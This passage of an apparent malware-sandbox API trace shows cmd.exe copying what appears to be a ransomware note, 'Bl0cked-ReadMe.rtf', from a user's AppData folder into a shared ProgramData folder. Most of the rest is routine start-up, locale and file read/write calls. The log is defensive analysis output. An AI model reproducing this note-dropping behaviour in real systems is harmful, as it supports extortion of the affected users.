lpType=0x12e944, lpData=0x12e948, lpcbData=0x12e940*=0x1000 | out: lpType=0x12e944*=0x0, lpData=0x12e948*=0x9, lpcbData=0x12e940*=0x1000) returned 0x2 [0193.864] RegCloseKey (hKey=0x40) returned 0x0 [0193.864] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88639b [0193.864] srand (_Seed=0x5b88639b) [0193.864] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~2\\Bl0cked-ReadMe.rtf\"" [0193.864] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~2\\Bl0cked-ReadMe.rtf\"" [0193.864] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0193.865] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2018d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0193.865] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0193.865] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0193.865] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0193.865] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0193.865] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0193.865] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0193.865] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0193.865] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0193.865] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 
[0193.865] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0193.865] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0193.865] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0193.865] GetEnvironmentStringsW () returned 0x2022c0* [0193.865] FreeEnvironmentStringsW (penv=0x2022c0) returned 1 [0193.865] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0193.865] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0193.865] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0193.865] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0193.865] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0193.865] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0193.865] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0193.865] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0193.865] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0193.866] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0193.866] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f708 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0193.866] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f708, lpFilePart=0x12f704 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f704*="Desktop") returned 0x18 [0193.866] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0193.866] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f484 | out: lpFindFileData=0x12f484) returned 0x200000 [0193.866] FindClose (in: hFindFile=0x200000 | out: hFindFile=0x200000) returned 1 [0193.866] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f484 | 
out: lpFindFileData=0x12f484) returned 0x200000 [0193.866] FindClose (in: hFindFile=0x200000 | out: hFindFile=0x200000) returned 1 [0193.866] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f484 | out: lpFindFileData=0x12f484) returned 0x200000 [0193.866] FindClose (in: hFindFile=0x200000 | out: hFindFile=0x200000) returned 1 [0193.866] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0193.866] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0193.866] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0193.866] GetEnvironmentStringsW () returned 0x202ae0* [0193.867] FreeEnvironmentStringsW (penv=0x202ae0) returned 1 [0193.867] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0193.867] GetConsoleOutputCP () returned 0x1b5 [0193.867] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0193.867] GetUserDefaultLCID () returned 0x409 [0193.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0193.868] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f848, cchData=128 | out: lpLCData="0") returned 2 [0193.868] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f848, cchData=128 | out: lpLCData="0") returned 2 [0193.868] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f848, cchData=128 | out: lpLCData="1") returned 2 [0193.868] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0193.868] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0193.868] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | 
out: lpLCData="Tue") returned 4 [0193.868] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0193.868] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0193.868] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0193.868] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0193.868] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0193.868] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0193.868] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0193.868] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0193.869] GetConsoleTitleW (in: lpConsoleTitle=0x1f08d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0193.869] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0193.869] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0193.869] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0193.869] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0193.870] _wcsicmp (_String1="type", _String2=")") returned 75 [0193.870] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0193.870] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0193.870] _wcsicmp (_String1="IF", _String2="type") returned -11 [0193.870] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0193.870] _wcsicmp (_String1="REM", _String2="type") returned -2 [0193.870] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0193.873] _get_osfhandle 
(_FileHandle=1) returned 0x7 [0193.873] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.873] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.873] GetFileType (hFile=0x7) returned 0x2 [0193.874] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0193.874] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12f740 | out: lpMode=0x12f740) returned 1 [0193.874] _dup (_FileHandle=1) returned 3 [0193.874] _close (_FileHandle=1) returned 0 [0193.874] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\MICROS~2\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0193.874] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\alluse~1\\micros~2\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x12f710, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0193.875] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0193.875] GetConsoleTitleW (in: lpConsoleTitle=0x12f540, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0193.876] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0193.876] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0193.876] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0193.876] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0193.876] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0193.877] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x12f0a4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f0a4) returned 0x1f0e58 [0193.877] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0193.877] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0193.877] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: 
"c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0193.877] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x12dfb0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0193.877] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0193.877] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.877] GetFileType (hFile=0x54) returned 0x1 [0193.877] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.878] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x12e008 | out: lpFileSizeHigh=0x12e008*=0x0) returned 0x1632 [0193.878] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.878] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.878] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.878] ReadFile (in: hFile=0x54, lpBuffer=0x12ee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e030, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesRead=0x12e030*=0x200, lpOverlapped=0x0) returned 1 [0193.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.878] GetFileType (hFile=0x4c) returned 0x1 [0193.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.878] GetFileType (hFile=0x4c) returned 0x1 [0193.878] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.878] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.879] GetFileType (hFile=0x4c) returned 0x1 [0193.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.879] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee90*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee90*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.879] GetFileType (hFile=0x4c) returned 0x1 [0193.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.879] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12eee0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.880] GetFileType (hFile=0x4c) returned 0x1 [0193.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.880] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef30*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.880] GetFileType (hFile=0x4c) returned 0x1 [0193.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.880] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef80*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.880] GetFileType (hFile=0x4c) returned 0x1 [0193.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.880] WriteFile (in: hFile=0x4c, lpBuffer=0x12efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12efd0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.880] GetFileType (hFile=0x4c) returned 0x1 [0193.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.880] WriteFile (in: hFile=0x4c, lpBuffer=0x12f020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e024, 
lpOverlapped=0x0 | out: lpBuffer=0x12f020*, lpNumberOfBytesWritten=0x12e024*=0x20, lpOverlapped=0x0) returned 1 [0193.880] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.880] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e010 | out: lpNewFilePointer=0x0) returned 1 [0193.880] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.880] ReadFile (in: hFile=0x54, lpBuffer=0x12ee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e030, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesRead=0x12e030*=0x200, lpOverlapped=0x0) returned 1 [0193.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.880] GetFileType (hFile=0x4c) returned 0x1 [0193.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.880] GetFileType (hFile=0x4c) returned 0x1 [0193.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.881] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.881] GetFileType (hFile=0x4c) returned 0x1 [0193.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.881] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee90*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.881] GetFileType (hFile=0x4c) returned 0x1 [0193.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.881] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12eee0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.881] GetFileType (hFile=0x4c) returned 0x1 [0193.881] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0193.881] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef30*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.881] GetFileType (hFile=0x4c) returned 0x1 [0193.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.881] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef80*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.881] GetFileType (hFile=0x4c) returned 0x1 [0193.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.881] WriteFile (in: hFile=0x4c, lpBuffer=0x12efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12efd0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.881] GetFileType (hFile=0x4c) returned 0x1 [0193.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.881] WriteFile (in: hFile=0x4c, lpBuffer=0x12f020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12f020*, lpNumberOfBytesWritten=0x12e024*=0x20, lpOverlapped=0x0) returned 1 [0193.881] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.881] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e010 | out: lpNewFilePointer=0x0) returned 1 [0193.881] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.881] ReadFile (in: hFile=0x54, lpBuffer=0x12ee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e030, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesRead=0x12e030*=0x200, lpOverlapped=0x0) returned 1 [0193.881] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0193.881] GetFileType (hFile=0x4c) returned 0x1 [0193.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.881] GetFileType (hFile=0x4c) returned 0x1 [0193.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.882] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.882] GetFileType (hFile=0x4c) returned 0x1 [0193.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.882] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee90*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.882] GetFileType (hFile=0x4c) returned 0x1 [0193.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.882] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12eee0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.882] GetFileType (hFile=0x4c) returned 0x1 [0193.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.882] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef30*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.882] GetFileType (hFile=0x4c) returned 0x1 [0193.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.882] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef80*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) 
returned 1 [0193.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.882] GetFileType (hFile=0x4c) returned 0x1 [0193.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.882] WriteFile (in: hFile=0x4c, lpBuffer=0x12efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12efd0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.882] GetFileType (hFile=0x4c) returned 0x1 [0193.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.882] WriteFile (in: hFile=0x4c, lpBuffer=0x12f020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12f020*, lpNumberOfBytesWritten=0x12e024*=0x20, lpOverlapped=0x0) returned 1 [0193.882] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.882] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e010 | out: lpNewFilePointer=0x0) returned 1 [0193.882] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.882] ReadFile (in: hFile=0x54, lpBuffer=0x12ee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e030, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesRead=0x12e030*=0x200, lpOverlapped=0x0) returned 1 [0193.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.882] GetFileType (hFile=0x4c) returned 0x1 [0193.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.882] GetFileType (hFile=0x4c) returned 0x1 [0193.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.883] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.883] GetFileType (hFile=0x4c) returned 0x1 [0193.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.883] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee90*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee90*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.883] GetFileType (hFile=0x4c) returned 0x1 [0193.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.883] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12eee0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.883] GetFileType (hFile=0x4c) returned 0x1 [0193.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.883] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef30*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.883] GetFileType (hFile=0x4c) returned 0x1 [0193.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.883] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef80*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.883] GetFileType (hFile=0x4c) returned 0x1 [0193.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.883] WriteFile (in: hFile=0x4c, lpBuffer=0x12efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12efd0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.883] GetFileType (hFile=0x4c) returned 0x1 [0193.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.883] WriteFile (in: hFile=0x4c, lpBuffer=0x12f020*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12f020*, lpNumberOfBytesWritten=0x12e024*=0x20, lpOverlapped=0x0) returned 1 [0193.883] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.883] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e010 | out: lpNewFilePointer=0x0) returned 1 [0193.883] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.883] ReadFile (in: hFile=0x54, lpBuffer=0x12ee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e030, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesRead=0x12e030*=0x200, lpOverlapped=0x0) returned 1 [0193.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.883] GetFileType (hFile=0x4c) returned 0x1 [0193.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.883] GetFileType (hFile=0x4c) returned 0x1 [0193.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.884] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.884] _get_osfhandle (_FileHandle=1) returned 0x4c 